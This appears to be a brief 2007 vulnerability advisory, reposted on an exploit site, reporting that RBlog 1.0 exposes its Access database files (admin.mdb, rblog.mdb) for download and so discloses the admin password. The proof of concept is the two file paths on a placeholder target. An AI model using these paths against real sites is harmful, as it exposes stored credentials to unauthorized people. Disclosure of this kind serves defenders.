id: 1352
date: 01/01/2007
title: RBlog 1.0 (admin.mdb) Remote Password Disclosure Vulnerablity
author: Aria-Security Team
cves: 

=============================================================
RBlog 1.0 (admin.mdb) Remote Password Disclosure Vulnerablity
=============================================================


#<Aria-Security Team>
#<Happy New Year!!>
#<Aria-Security.com For English>
#<Aria-Security.net For Parsi>
#Discovered: Aria-Security Team
#Risk: Low
#Type:Remote Database Download
#PoC:

#http://TARGET/path/data/admin.mdb
#http://TARGET/path/data/rblog.mdb




#  0day.today [2023-03-23]  #